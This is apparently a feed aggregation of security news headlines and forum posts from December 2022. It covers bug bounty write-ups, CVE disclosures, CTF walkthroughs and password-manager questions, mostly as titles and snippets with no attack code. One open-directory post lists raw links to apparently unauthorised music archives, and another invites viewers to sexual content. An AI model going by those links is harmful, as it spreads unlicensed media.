I'd still like to know what I'm doing wrong (besides using HyperV) and how to fix it. submitted by /u/rtuite81 [link] [comments]
    Visualizing Attacker Activity
    Good morning /r/computerforensics, Is there a software that you prefer for making graphical timelines of attacker activities across multiple devices? Thanks! submitted by /u/DeadBirdRugby [link] [comments]
    Slow down Bulk Extractor
    Hi all, I am doing my project about Bulk Extractor to slow down the tool or increase the false (positives, negatives) results (anti-carving). I tried to understand the scanner code and did with some examples such as encryption, regex testing but did not get potential results. It seems very hard due to the newest version BE 2.0 has a lot of improvement. So does anyone have any suggestions? Thanks submitted by /u/tthseus [link] [comments]
  • Open

    Brute-force attacks with image captcha bypass using bash script and OCR
    CAPTCHA is a kind of security measure known for application complement its authentication with a challenge and response avoiding robots… Continue reading on Medium »
  • Open

    SecWiki News 2022-12-27 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-12-27 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    Automakers: Is your org ISO/SAE 21434 ready?
    Security organizations in automotive manufacturers and suppliers have a huge task underway or to undertake: to safeguard the software… Continue reading on Medium »
  • Open

    Automakers: Is your org ISO/SAE 21434 ready?
    Security organizations in automotive manufacturers and suppliers have a huge task underway or to undertake: to safeguard the software… Continue reading on Medium »
  • Open

    Navigating the Vast Ocean of Sandbox Evasions
    After creating a bespoke sandbox environment, we discuss techniques used to target malware evasions with memory detection and more. The post Navigating the Vast Ocean of Sandbox Evasions appeared first on Unit 42.
  • Open

    OWASAP juice shop lab setup
    The OWASP Top 10 is a standard mindfulness document for inventors and web operation security. It represents a broad agreement about the… Continue reading on Medium »
    Efficient methodology to get P2 level - subdomain takeover vulnerability
    Hello Guys, I’m Suprit a cybersecurity enthusiast and researcher. Continue reading on InfoSec Write-ups »
    XXE (XML EXTERNAL ENTITY) Injection
    What is XML external entity injection? Continue reading on Medium »
    Learning Web-Sec - Day 1
    The basics you need to know to get better at SQL injection. Continue reading on Medium »
    Stored XSS vulnerability in Microsoft booking
    This blog is regarding my finding on microsoft 365. One fine day I was working in my office and I received one calendar invite from my… Continue reading on Medium »
  • Open

    JNDI Injection Series: RMI Vector — 1
    No content preview
    Safe Opener — Reverse Engineering | PicoCTF 2022 Writeup
    No content preview
    Efficient methodology to get P2 level - subdomain takeover vulnerability
    No content preview
    Tautulli 2.1.9 version; Cross-Site Request Forgery (ShutDown) and Denial of Service (Metasploit)
    No content preview
  • Open

    JNDI Injection Series: RMI Vector — 1
    No content preview
    Safe Opener — Reverse Engineering | PicoCTF 2022 Writeup
    No content preview
    Efficient methodology to get P2 level - subdomain takeover vulnerability
    No content preview
    Tautulli 2.1.9 version; Cross-Site Request Forgery (ShutDown) and Denial of Service (Metasploit)
    No content preview
  • Open

    JNDI Injection Series: RMI Vector — 1
    No content preview
    Safe Opener — Reverse Engineering | PicoCTF 2022 Writeup
    No content preview
    Efficient methodology to get P2 level - subdomain takeover vulnerability
    No content preview
    Tautulli 2.1.9 version; Cross-Site Request Forgery (ShutDown) and Denial of Service (Metasploit)
    No content preview
  • Open

    A gitbook on ARM exploitation
    submitted by /u/Financial-Republic27 [link] [comments]
  • Open

    DirectX Hook - 优雅的实现游戏辅助窗口
    作者:The_Itach1@知道创宇404实验室 日期:2022年12月27日 前言:最近看到了一个github的项目,分析过后觉得里面无论是代码还是界面都很好看,然后开始研究其代码。 这篇文章主要分析其如何实现的辅助窗口的实现,其用到的东西有minihook+DirectX11(9) Hook+imgui。 Minihook 项目地址:TsudaKageyu/minhook: The Mi...
  • Open

    DirectX Hook - 优雅的实现游戏辅助窗口
    作者:The_Itach1@知道创宇404实验室 日期:2022年12月27日 前言:最近看到了一个github的项目,分析过后觉得里面无论是代码还是界面都很好看,然后开始研究其代码。 这篇文章主要分析其如何实现的辅助窗口的实现,其用到的东西有minihook+DirectX11(9) Hook+imgui。 Minihook 项目地址:TsudaKageyu/minhook: The Mi...

  • Open

    iPhone weird stuff question
    Hey guys, I just noticed something on my phone and realized that weird things have happened on this iPhone in the past few weeks I just haven’t thought of it all until now. A photo that I had since long ago deleted came back up on my photostat library. There was a red dot on the upper right hand corner of my phone app and that means that the microphone is on There was a safari browser open on my list of open things with past websites that I had saved even though I had deleted the safari browser weeks ago Are these just normal things or am I being hacked? Lol thank you! submitted by /u/Normal-Question-1994 [link] [comments]
    Best Password Manager?
    Hello all! I realize this question has been asked a thousand times but I feel I have a good reason for asking again. I currently use LastPass and due to the most recent breach I'm not happy with the way they handled it so I'm looking at switching. From what I've seen both 1Password and Bitwarden are top of the list. I went to check out 1Password however and on the iOS app store it has pretty bad reviews and appears the app as been updated to "1Password 8". Thus, this leads me to why I'm asking this question. I haven't seen this question addressed since the LastPass breach nor anything on 1Password since the app has been "rebuilt". So, what are your thoughts and opinions? And I realize any password manager can be breached. It's simply the way they handled it that I'm not impressed with. Thank you! submitted by /u/Parceble [link] [comments]
    Working in a private cloud MSP. Is it worth it experience wise?
    I received an offer for a network support position ( network administrator ) in a managed private cloud service provider ( VMWare, Azure as vendor ). Currently working at a TAC for a known network vendor supporting their firewall. I'm worried that this role being mostly support ( few change requests, policies, VPN tunnels, VLANs etc. ) could be less benefiting from a career perspective than a more generic network engineer role in an enterprise enviorement ( as it would include maintenance, support, planning , deployment etc. Please share your opinion in the above worries. Can you switch into an enterprise role easily after a support role from an MSP? How do companies offering contract role view MSP experience? They highlighted that the role is challenging at least 20 times during two interviews and that after 6-12 months project work ( FW deployments, migratons etc. ) can be requested as well. Tech stack: - Firewalls: Fortinet, Clavister - Cisco ASR Routers - Switches: Arista, Cumulus - VMWare NSX - NO Automation, NO SD-WAN Tickets are highly variated, examples but not limited to: - Change requests - L2/L3 redundancy - IPSec, SSL VPN, interconnects - Generic R/S TS submitted by /u/Appropriate_Mind2866 [link] [comments]
    Can I use a mobile hotspot while using a VPN on my laptop? Or is that less secure than using my broadband connection?
    I am currently using my mobile (iphone) as a hotspot for my laptop, as my regular broadband connection is extremely slow. I enable a VPN (mullvad) on my laptop, but not my mobile. Is this safe? Do I still have a good amount of privacy? Should I enable VPN on my phone instead/alongside my desktop? Is using my regular broadband the more secure option? submitted by /u/notarobot3675 [link] [comments]
    SOAR Engineer Technical Interview
    Hi everyone, I have a "technical interview" coming up for a position as a SOAR (Security Orchestration Automation & Response) Engineer and unfortunately the company has given me no information on what tools or topics it could cover. I was wondering if any SOAR Engineers might have some guidance on what I could be doing to best prepare myself? I've got just over a year of experience working at a SOC Analyst and have done some detection content work. Both my current company and the one I am interviewing for use Splunk. It seems like since SOAR is a relatively new and niche area that information about technical interviews other companies have done is hard to find. If anyone has an experience they could share it would mean the world to me. I shifted to cyber through a conversion msc in the UK after many years doing unskilled work so if anyone has any questions about making that transition feel free to ask away. Happy to help. I'll post what the interview was like once it's done if anyone is interested. Thanks! submitted by /u/Pretend_Beautiful768 [link] [comments]
    Best practices for password security
    In recent weeks I'm trying to understand the best practices to secure my password information among others things. So, I would like to have opinions about what are you using, how you backup information, and how you grant that for some reason you forget some master password you still have a way to recover access to your accounts. For example: Using a pro bitwarden account in their servers can lead to a problem like lastpass. But if you self host the server, you can have a breach in your network. Using 2FA app such as google, microsoft, authy or even a yubico key. Using a email adress only to use as recover on this systems?! What are the best options to have a secure system, with backups and recover options? Thanks for your help! submitted by /u/matavelhos [link] [comments]
  • Open

    Pass-the-Challenge: Defeating Windows Defender Credential Guard
    submitted by /u/ly4k_ [link] [comments]
  • Open

    DOM XSS Using Web Messages (Practioner) — Portswigger Lab 1 | Solution and Approach
    No content preview
    Advent of Cyber 4 writeup: A case study in digital forensics and incident response
    Digital forensics and incident response is a necessary process for any organisation that is serious about keeping the computers secure! Continue reading on InfoSec Write-ups »
    ‍IW Weekly #39: $10,000 Bounty, Zero-click Account Takeover, Stored XSS, Open Redirection…
    No content preview
    Understanding the NumPy Module: Its Use in Cyber Security
    No content preview
    Understanding Memcache Injection
    No content preview
    Performing Security Gap Analysis using Breach & Attack Simulation (BAS) Tools
    Continuous Testing and Auditing - Purple Teaming Activity Continue reading on InfoSec Write-ups »
    Advent of Cyber 2022 [Day 1 — Day 24] All Challenges Walkthrough and Writeups with Answers by…
    No content preview
    Understanding the Scapy Module: Its Use in Cyber Security
    No content preview
    Endpoint Security: The Protection Mechanism of Web Application and Networks
    Introduction Continue reading on InfoSec Write-ups »
    Securing your Linux server with these best practices
    Introduction Continue reading on InfoSec Write-ups »
  • Open

    DOM XSS Using Web Messages (Practioner) — Portswigger Lab 1 | Solution and Approach
    No content preview
    Advent of Cyber 4 writeup: A case study in digital forensics and incident response
    Digital forensics and incident response is a necessary process for any organisation that is serious about keeping the computers secure! Continue reading on InfoSec Write-ups »
    ‍IW Weekly #39: $10,000 Bounty, Zero-click Account Takeover, Stored XSS, Open Redirection…
    No content preview
    Understanding the NumPy Module: Its Use in Cyber Security
    No content preview
    Understanding Memcache Injection
    No content preview
    Performing Security Gap Analysis using Breach & Attack Simulation (BAS) Tools
    Continuous Testing and Auditing - Purple Teaming Activity Continue reading on InfoSec Write-ups »
    Advent of Cyber 2022 [Day 1 — Day 24] All Challenges Walkthrough and Writeups with Answers by…
    No content preview
    Understanding the Scapy Module: Its Use in Cyber Security
    No content preview
    Endpoint Security: The Protection Mechanism of Web Application and Networks
    Introduction Continue reading on InfoSec Write-ups »
    Securing your Linux server with these best practices
    Introduction Continue reading on InfoSec Write-ups »
  • Open

    DOM XSS Using Web Messages (Practioner) — Portswigger Lab 1 | Solution and Approach
    No content preview
    Advent of Cyber 4 writeup: A case study in digital forensics and incident response
    Digital forensics and incident response is a necessary process for any organisation that is serious about keeping the computers secure! Continue reading on InfoSec Write-ups »
    ‍IW Weekly #39: $10,000 Bounty, Zero-click Account Takeover, Stored XSS, Open Redirection…
    No content preview
    Understanding the NumPy Module: Its Use in Cyber Security
    No content preview
    Understanding Memcache Injection
    No content preview
    Performing Security Gap Analysis using Breach & Attack Simulation (BAS) Tools
    Continuous Testing and Auditing - Purple Teaming Activity Continue reading on InfoSec Write-ups »
    Advent of Cyber 2022 [Day 1 — Day 24] All Challenges Walkthrough and Writeups with Answers by…
    No content preview
    Understanding the Scapy Module: Its Use in Cyber Security
    No content preview
    Endpoint Security: The Protection Mechanism of Web Application and Networks
    Introduction Continue reading on InfoSec Write-ups »
    Securing your Linux server with these best practices
    Introduction Continue reading on InfoSec Write-ups »
  • Open

    SecWiki News 2022-12-26 Review
    2022年安全架构总结以及2023安全方向展望 by ourren 越权漏洞自动化治理实践 by ourren SecWiki周刊(第460期) by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-12-26 Review
    2022年安全架构总结以及2023安全方向展望 by ourren 越权漏洞自动化治理实践 by ourren SecWiki周刊(第460期) by ourren 更多最新文章,请访问SecWiki
  • Open

    How to test for JWT attacks?
    Hi everyone in this blog I will try to summarize JWT attacks Continue reading on Medium »
    Bug is found in Production ?
    If a bug is found in production, below are what I would consider unfair vs fair questions to ask. Continue reading on Medium »
    Infosec career-paths: Penetration Tester
    Hello all today we will discuss another career in Infosec i.e. Continue reading on Medium »
    CSRF: The Silent Web Attack
    CSRF: The Stealthy Web Attack You Need to Know About Continue reading on Medium »
    how I found my first bug.
    Greetings everyone, I’m Koroush (aka whiteOwl). this is a quick write-up about how was able to find my first bug with google dorking… Continue reading on Medium »
    15,000 Consumers are Impacted by the TPG Telecom Cyberattack in Australia
    One of Australia’s top fixed broadband providers is TPG. TPG provides goods supported by top-notch fiber and next-generation networks Continue reading on Bug Zero »
    Authentication Bypass in Nexus manager (version 3.37.3–02)
    How I found Improper access control in Sonatype nexus manager. Continue reading on Medium »
  • Open

    OSINT frameworks
    OSINT, or Open Source INTelligence, is the practice of collecting, analyzing, and disseminating information from publicly available… Continue reading on Medium »
    Review: WGMY OSINT Writeup #1
    This is the sequel of the WGMY article Continue reading on Medium »
    OSINT 101: The Essential Guide to Protecting Your Business and Yourself.
    What is OSINT? Continue reading on Medium »
    10 Best OSINT Research Tools for Threat Intelligence
    OSINT (Open Source Intelligence) refers to the practice of gathering, analyzing, and using publicly available information for intelligence… Continue reading on Medium »
  • Open

    红蓝对抗之致盲 Windows defender
    Microsoft Defender 防病毒软件在 Windows 10 和 Windows 11 以及 Windows Server 版本中可用。
    FreeBuf早报 | 超9成中国企业将在2023年提升安全预算;蔚来汽车CEO再谈数据泄露
    12月25日,CEO李斌在谈及数据泄露事件时表示,蔚来“坚决不妥协”,“哪怕公司赔破产了,也不会在这个事情上妥协。
    如何使用Autobloody自动利用BloodHound显示的活动目录提权路径
    Autobloody是一款针对活动目录的安全审查工具,研究人员利用BloodHound扫描发现的活动目录提权路径来实现权限提升。
    2023的网安玩家,会和布洛芬退烧一样“凉”得快吗?
    作为网安行业一级市场投资人,在这里为大家做一下今年网安市场惨状的年终总结,也邀请了两位业界知名公司负责人讲述他们的行业见解。
    美国国会通过法案禁止政府设备安装 TikTok
    当地时间12月23日,美国国会通过了支出法案,其中包含禁止在政府设备上安装TikTok。
    【倒计时1天】精彩议题抢先看,贝壳SRC线上与你相约!
    充足干货、福利都已备好,1227就等你来!还没报名的小伙伴抓紧上车!
    包括美国前总统特朗普,攻击者窃取Twitter 4亿数据并出售
    攻击者还提供了包含1000个帐户的样本作为证明,其中包含了美国前总统特朗普的账户数据。
  • Open

    CVE-2022-46689: Proof-of-concept app to overwrite fonts on iOS
    Article URL: https://github.com/zhuowei/WDBFontOverwrite Comments URL: https://news.ycombinator.com/item?id=34137290 Points: 1 # Comments: 0
  • Open

    Late HackTheBox Walkthrough
    Summary Late is a Linux machine and is considered as an easy box by the hack the box. On this box, we will begin with
    Late HackTheBox Walkthrough
    Summary Late is a Linux machine and is considered as an easy box by the hack the box. On this box, we will begin with
  • Open

    CVE-2022-43552: HTTP Proxy deny use-after-free
    curl disclosed a bug submitted by bagder: https://hackerone.com/reports/1764858
    Account takeover - improper validation of jwt signature (with regards to experiation date claim)
    Linktree disclosed a bug submitted by twelvesix: https://hackerone.com/reports/1760403 - Bounty: $2500
  • Open

    The Windows Process Journey — wininit.exe (Windows Start-Up Application)
    submitted by /u/boutnaru [link] [comments]
    Introduction to Digital Forensics and Incident Response | TryHackMe DFIR
    submitted by /u/MotasemHa [link] [comments]
  • Open

    Tools and Techniques for Red Team
    Tools and Techniques for Red Team / Penetration Testing Continue reading on Medium »
  • Open

    Linux 内核网络调度器的漏洞和利用——专属 SLAB 提权
    作者: 360漏洞研究院 王晓东 刘永 原文链接:https://vul.360.net/archives/600 背景 The u32 filter Overview 所在模块: net/sched/cls_u32.c Ugly (or Universal) 32bit key Packet Classifier. Linux TC(traffic control) 流量控制介绍 Li...
  • Open

    Linux 内核网络调度器的漏洞和利用——专属 SLAB 提权
    作者: 360漏洞研究院 王晓东 刘永 原文链接:https://vul.360.net/archives/600 背景 The u32 filter Overview 所在模块: net/sched/cls_u32.c Ugly (or Universal) 32bit key Packet Classifier. Linux TC(traffic control) 流量控制介绍 Li...

  • Open

    KERBEROASTING Active directory
    submitted by /u/Clement_Tino [link] [comments]
  • Open

    The Harvester
    theharvester is a tool that was developed in python. Using this you can gather information like emails, subdomains, hosts, employee names… Continue reading on Medium »
    2022 #OSINT Journalism Review
    So, the year is almost over. I look back nostalgically on an exciting and educational 360 days. It’s time again for an end-of-the-season… Continue reading on Medium »
    2022 #OSINT Journalism Review
    So. Das Jahr ist fast rum. Ich schaue wehmütig auf spannende und lehrreiche 360 Tage zurück. Es ist wieder Zeit für ein End-of-the-Season… Continue reading on Medium »
    SPY NEWS: 2022 — Week 51
    Summary of the espionage-related news stories for the Week 51 (December 18–24) of 2022. Continue reading on Medium »
    The Role of Open Source Intelligence in Military Operations
    Open source intelligence (OSINT) is an essential tool for military organizations looking to gather and analyze information, plan and… Continue reading on Medium »
  • Open

    iPhone vs Pixel security?
    Which one is more secure against APTs? iPhone has been hacked by Pegasus repeatedly. It would be easier for a closed source operating systems to implement backdoors, IMHO. Google on the other hand is famous for data collection. But it’s got better software people. Pixel comes Chrome, more secure than Safari IMHO. Any idea? submitted by /u/chaplin2 [link] [comments]
  • Open

    GCPGoat(ine) GCP CTF solution Scenario 1 (SSRF and source code review)
    Hi readers, here we will be deploying and solving GCPGoat module 1 challenge. Continue reading on Medium »
    Red Team or Penetration Approach
    In Any Cyber engagement whether it’s a legal Red teaming maneuver or a black hat crime like exploiting unauthorized devices, fraud, or… Continue reading on Medium »
  • Open

    Internal Machine THM
    This is write up I write fro a while and I just found it in my files so I said let’s published maybe interests someone, I just put the… Continue reading on Medium »
    Find Hidden URLs EASILY!
    A hidden URL (web address) is a URL that is not visible or easily accessible to users on a website. Hidden URLs may be used for a variety… Continue reading on Medium »
  • Open

    SecWiki News 2022-12-25 Review
    Hopper:建模并检测横向移动攻击 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-12-25 Review
    Hopper:建模并检测横向移动攻击 by ourren 更多最新文章,请访问SecWiki
  • Open

    FreeBuf早报 | 黑客出售4亿推特用户数据库;字节跳动承认访问记者TikTok数据
    美国国会通过了拨款法案,其中包括禁止政府设备安装 TikTok,法案将在总统拜登签署之后生效。
    如何使用S3cret Scanner搜索公共S3 Bucket中的敏感信息
    S3cret Scanner是一款针对S3 Bucket的安全扫描工具,在该工具的帮助下,广大研究人员可以轻松扫描上传到公共S3 Bucket中的敏感信息。
    Shennina:一款带有人工智能的自动化主机渗透工具
    Shennina是一款功能强大的自动化主机渗透/漏洞利用框架,实现安全扫描、漏洞扫描/分析和漏洞利用开发的完全自动化。
  • Open

    Why I love RegRipper
    Yes, yes, I know...you're probably thinking, "you wrote it, dude", and while that's true, that's not the reason why I really love RegRipper. Yes, it's my "baby", but there's so much more to it than that. For me, it's about flexibility and utility. At the beginning of 2020, there was an issue with the core Perl module that RegRipper is built on...all of the time stamps were coming back as all zeros. So, I tracked down the individual line of code in the specific module, and changed it...then recompiled the EXEs and updated the Github repo. Boom. Done. I've written plugins during investigations, based on new things I found, and I've turned around working plugins in under an hour for folks who've reached out with a concise request and sample data. When I've seen something on social media, or s…
  • Open

    nextcloudcmd incorrectly trusts bad TLS certificates
    Nextcloud disclosed a bug submitted by tobiaskaminsky: https://hackerone.com/reports/1699740
    Talk Android broadcast receiver is not protected by broadcastPermission allowing malicious apps to communicate
    Nextcloud disclosed a bug submitted by andyscherzinger: https://hackerone.com/reports/1596459
    Developer Mistake
    MTN Group disclosed a bug submitted by coyemerald: https://hackerone.com/reports/1058135
    Exposure Of Admin Username & Password
    MTN Group disclosed a bug submitted by coyemerald: https://hackerone.com/reports/1703733
  • Open

    “I’m selling data of 400M Twitter users that was scraped via a vulnerability”
    Article URL: https://breached.vc/Thread-Selling-Twitter-Data-Breach-400-million-users Comments URL: https://news.ycombinator.com/item?id=34125843 Points: 461 # Comments: 255
  • Open

    Overview of Glibc Heap Exploitation Techniques (currently up to v2.34)
    submitted by /u/himeko98 [link] [comments]

  • Open

    Bug Bounty
    i learned exploit development/vulnerability researching and i want to earn money from this right now i really dont know from where i can start i want to hunt c/c++ source codes/executables please help me! submitted by /u/Z0rch3r [link] [comments]
    Analyzing CVE-2022-23093
    submitted by /u/DLLCoolJ [link] [comments]
  • Open

    Feeling sad about Maxi Jazz - https://www.abc.net.au/news/2022-12-25/faithless-singer-maxi-jazz-dies/101808066
    None of these are at parent directory and at least 1 is a pearoast http://media.d7tv.com/BPN/mus/Faithless/ https://master255.org/res/Wanted/F/Faithless/ https://sinj.com/17/dance/ http://b1g-arch1ve.buho.ch/trance/_UNSORTED_B/Trance%20and%20Dance/ Fuck it - let's add to the list https://bear.seedhost.eu/ayrshiredj/website/Stuff/Music/Mashups/ http://www.ossh.com/midi/sound/pop/ http://kadak.mrak.cz/mp3/V.A.%20-%20%20HUST19/PART3/ pretty sure that last 1 is 1 I've posted recently. submitted by /u/ringofyre [link] [comments]
    A timely reminder on why we have RULE 5
    be OD poster post normal non re-encoded OD link be copyright botherer (more than likely a bot), find normal OD post REEEE, subMods remove link plz for contravening the Digital Millennium copyright act!!11!! be rest of sub "oh noes, a link is lost to the bad guys!" be OD poster "teehee - I'm going to hide this precious OD link with base 2056 encoding & hash it with md5000" be copyright botherer, find weird looking 'link' REEE!!11!! - REDDIT PLZ REMOVE SUB FOR TRYING TO HIDE LINKS THAT CONTRAVENE DCMA be rest of sub This subreddit has been banned for breaking Reddit's Rules. submitted by /u/ringofyre [link] [comments]
    even MORE coloring pages :]
    submitted by /u/lambda077 [link] [comments]
    Let’s try this again, with all new content. More pics and videos of us, late 30s early 40s dad bod (chunky) and mom bod(curvy) in various acts.
    The last folder we shared got views, a couple of comments, a couple of them not so happy we were there, but many more who followed us and explained that they enjoyed what they saw. So, we’ll try this again. Please make sure to try to drop us a dm or comment here if we had any kind of positive effect. submitted by /u/nosnebn6 [link] [comments]
    Several Movies
    158:003 submitted by /u/Naul_696 [link] [comments]
    Went looking for Shelter (90's hardcore-ish band). Didn't find a lot. Found a shitload of weird and wonderful music etc. instead... Prophylactic [NSFW] - haven't had a gud look so better to be safe...
    https://www.frequence7.net/son/ https://www.uvm.edu/~ngotelli/ https://teresadapraiamidis.com/Mp3/ https://phapthihoi.org/kinh/Audio/ http://167.114.174.132:9092/ https://jacobsm.com/geedryve/ https://www.dhammatalks.org/Archive/ https://djmzone.info/Samples/ https://www.olliehalsall.co.uk/download/ http://80s.lt/Files/ let's see if this works: /u/ODScanner EDIT: guess not! submitted by /u/ringofyre [link] [comments]
  • Open

    Race conditions : bug bounties
    Race conditions vulnerabilities, in my opinon, are one of the most interesting web vulnerabilities. They arise from the simplest mistakes… Continue reading on Medium »
    Bypassing SSRF Protections
    Hello, Continue reading on Medium »
    Hello world — Notes from a hacking newbie
    Greetings Medium readers, I'm Mister Impossible, a wannabe ethical hacker / bug bounty hunter from England in the United Kingdom and this… Continue reading on Medium »
    CRLF Injection — xxx$ — How was it possible for me to earn a bounty with the Cloudflare WAF?
    I recently discovered a CRLF injection vulnerability on a popular website. In this blog post, I will describe the vulnerability and the… Continue reading on InfoSec Write-ups »
    Bypass Apple’s redirection process with the dot (“.”) character
    Hi guys, I have been gone for a while but now I’m back and here is a new write-up post. Today, I’m gonna show you the Open Redirection… Continue reading on InfoSec Write-ups »
    CAN BUG BOUNTY REPLACE PENTESTING
    Security flaws are a serious issue for all software engineers and the organizations that employ them. Many flaws are inconvenient but… Continue reading on Medium »
    How I hacked into police and ivoted attack to RCE
    Let’s breach in guys,So there was Section for the appreciation letters on site which has public appreciation letters of police.wich has… Continue reading on Medium »
    How to earn $2500 a month through Bug bounty [Kurdish languages]
    سەرەتا سلاوتان لێبێت من احمد عبدالله لە (سایبەر شێلد)دەمەوێت لەم نووسینەمدا باسی ئەوەتان بۆبكەم كە چۆن ببیتە بەگ باونتەریكی سەركەوتویان… Continue reading on Medium »
  • Open

    High-Severity Vulnerability at Kyverno
    Article URL: https://www.armosec.io/blog/cve-2022-47633-kyvernos-container-image-signature-verification/ Comments URL: https://news.ycombinator.com/item?id=34120172 Points: 1 # Comments: 0
    ENLBufferPwn: A vulnerability for several Nintendo 3DS, Wii U, Switch games
    Article URL: https://github.com/PabloMK7/ENLBufferPwn Comments URL: https://news.ycombinator.com/item?id=34117119 Points: 2 # Comments: 1
    Critical Remote Code Execution Vulnerability in Spnego Security Mechanism
    Article URL: https://securityintelligence.com/posts/critical-remote-code-execution-vulnerability-spnego-extended-negotiation-security-mechanism/ Comments URL: https://news.ycombinator.com/item?id=34112681 Points: 1 # Comments: 0
  • Open

    Pythonic Malware Part-3: In-Memory Execution and Modern Evasion
    Forget compiling payloads and operating on disk — this post demonstrates the use of Python’s portable interpreter for in-memory malware… Continue reading on InfoSec Write-ups »
    CRLF Injection — xxx$ — How was it possible for me to earn a bounty with the Cloudflare WAF?
    I recently discovered a CRLF injection vulnerability on a popular website. In this blog post, I will describe the vulnerability and the… Continue reading on InfoSec Write-ups »
    Know Your Adversary: Cuba Ransomware
    No content preview
    Bypass Apple’s redirection process with the dot (“.”) character
    No content preview
  • Open

    Pythonic Malware Part-3: In-Memory Execution and Modern Evasion
    Forget compiling payloads and operating on disk — this post demonstrates the use of Python’s portable interpreter for in-memory malware… Continue reading on InfoSec Write-ups »
    CRLF Injection — xxx$ — How was it possible for me to earn a bounty with the Cloudflare WAF?
    I recently discovered a CRLF injection vulnerability on a popular website. In this blog post, I will describe the vulnerability and the… Continue reading on InfoSec Write-ups »
    Know Your Adversary: Cuba Ransomware
    No content preview
    Bypass Apple’s redirection process with the dot (“.”) character
    No content preview
  • Open

    Pythonic Malware Part-3: In-Memory Execution and Modern Evasion
    Forget compiling payloads and operating on disk — this post demonstrates the use of Python’s portable interpreter for in-memory malware… Continue reading on InfoSec Write-ups »
    CRLF Injection — xxx$ — How was it possible for me to earn a bounty with the Cloudflare WAF?
    I recently discovered a CRLF injection vulnerability on a popular website. In this blog post, I will describe the vulnerability and the… Continue reading on InfoSec Write-ups »
    Know Your Adversary: Cuba Ransomware
    No content preview
    Bypass Apple’s redirection process with the dot (“.”) character
    No content preview
  • Open

    Do you tell people if you’re a pen tester irl?
    I’m at the stage where I don’t know if mentioning it will make people worried due to the skill set. Layer 8 misunderstandings submitted by /u/Waddup_yall [link] [comments]
    Keeping the latest last pass breach in mind, is it safer to use password managers without entering the url of the site or the name of that site.
    I am not an expert when it comes to security but recently i have been omitting the url and name of the site when creating a record in my password manager (not last pass) because I am a bit paranoid. I usually name the record something else entirely and I am pretty good at remembering which gibberish name maps to which site. Is this a more secure way to save passwords using password managers? I mean if an attacker ends up breaching my password manager's database and lets say some how gets unencrypted data the attacker still doesn't know where to enter it so this approach should be slightly more secure right? or am I putting in extra effort for no reason? submitted by /u/gmercer25 [link] [comments]
  • Open

    WGMY OSINT Writeup #1
    Usually on the end of the year, Wargames.MY is held. This CTF is creme de la creme of Malaysian CTF with huge pool of participant and cash… Continue reading on Medium »
  • Open

    SecWiki News 2022-12-24 Review
    OA-EXPTOOL: OA综合利用工具 by 路人甲 内网渗透从零到一之SMB协议 by 路人甲 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-12-24 Review
    OA-EXPTOOL: OA综合利用工具 by 路人甲 内网渗透从零到一之SMB协议 by 路人甲 更多最新文章,请访问SecWiki
  • Open

    Backdoor HackTheBox Walkthrough
    Summary Backdoor is a Linux machine and is considered an easy box the hack the box. On this box we will begin with a basic
    Backdoor HackTheBox Walkthrough
    Summary Backdoor is a Linux machine and is considered an easy box the hack the box. On this box we will begin with a basic
  • Open

    Information Disclosure Leads To User Data Leak
    MTN Group disclosed a bug submitted by netboy: https://hackerone.com/reports/1541660
    mysql credentials exposed on - https://cz.acronis.com/docker-compose.yml
    Acronis disclosed a bug submitted by melar_dev: https://hackerone.com/reports/963384 - Bounty: $150
  • Open

    Exploit MS17–010 without Metasploit
    Introduction Continue reading on Medium »
  • Open

    You’re doing pentesting wrong.
    You have all the testing tools and processes: SAST, DAST, pentesting, vulnerability disclosure program (bug bounty). Buy why are there… Continue reading on Medium »
  • Open

    You’re doing pentesting wrong.
    You have all the testing tools and processes: SAST, DAST, pentesting, vulnerability disclosure program (bug bounty). Buy why are there… Continue reading on Medium »
  • Open

    七彩话合规|简述MPL2.0
    七彩话合规是棱镜七彩推出的全新内容板块,涵盖开源合规基础知识、常见许可证翻译、常见合规问答等多个模块。
    端点安全杂谈(二)市场&用户
    写在前面杂谈开篇list了一堆表虽然不是2022年最新但也能凑合看了,想到哪里写到哪里,后续会对我了解的不同内容分别做些记录,如果你有想法我希望能一起讨论。描述的所有内容目前只涉及非密环境
  • Open

    Linux kernel module generator for Hidden firewall that follows the rules in the external YAML file.
    submitted by /u/CoolerVoid [link] [comments]

  • Open

    Why is this Yara rules regular expression not matching when looking at PE Header?
    Hello, I'm wondering if someone more familiar with Yara than I am can tell me why my regex is not working in this rule. I have verified that the field in the particular file does contain characters that this would normally match. I have tested the regex to just match on file content and it works. I do not receive any errors, it just doesn't match have tried multiple versions of yara 4.2 and later. ​ Here is an example of what it should match in this field: https://regex101.com/r/M5QEHj/1 ​ import "pe" rule regex_test { condition: pe.version_info["OriginalFilename"] matches /\p{Cyrillic}/ } submitted by /u/KING_WINSOME [link] [comments]
    Is a backdoor a simpler explanation for an apparent zero-click attack on high-profile targets (Pegasus)?
    Clarification. By backdoor I mean, for example, the OS developer deliberately leaving vulnerabilities, sharing them with a front organization (NSO Group) which could then develop the spyware (Pegasus) based on them and offer it to intelligence agencies of friendly governments. Questions. Would this process be easier than just executing a zero-click attack? This might work for Apple with iOS but I don’t know how difficult would it be for Google to introduce vulnerabilities and let it go unnoticed for a lot of time in Android which is open source. Does the incident of polkit privilege escalation vulnerability being unnoticed for 12 years show that it could also be possible to do with Android? Motivation. (This is unrelated to this sub but I'm just adding this so that people could understand why I'm asking this.) First, revelations of PRISM showed that both intelligence agencies and all the major OS developers for smartphones would be willing to collaborate on such a program. Second, this strategy would make it safer for both since it would limit the number of insiders who are aware of this and also offer them plausible deniability in case the front is caught. They could have multiple fronts working at the same time which can undergo closure/prosecution and be replaced as and when they are caught. submitted by /u/vinamrsachdeva [link] [comments]
    How to select a MDR/MSSP partner (evaluation criteria)?
    Hi guys, we are planning to further improve our IT security by integrating an XDR/MDR solution into our infrastructure (10 global locations, 1800 endpoints, 40 physical hosts, 600 virtual server). Our IT team needs to focus on adding value to the business (mid-sized tooling manufacturer in Europe), so we are looking for a MDR/MSSP partner with a good reputation to take over this role. Can anyone share online resources, white papers, or personal experiences on criteria for evaluating and comparing MDR/MSSP service offerings? submitted by /u/gerhardmpl [link] [comments]
    Need help with configuring AlienVault
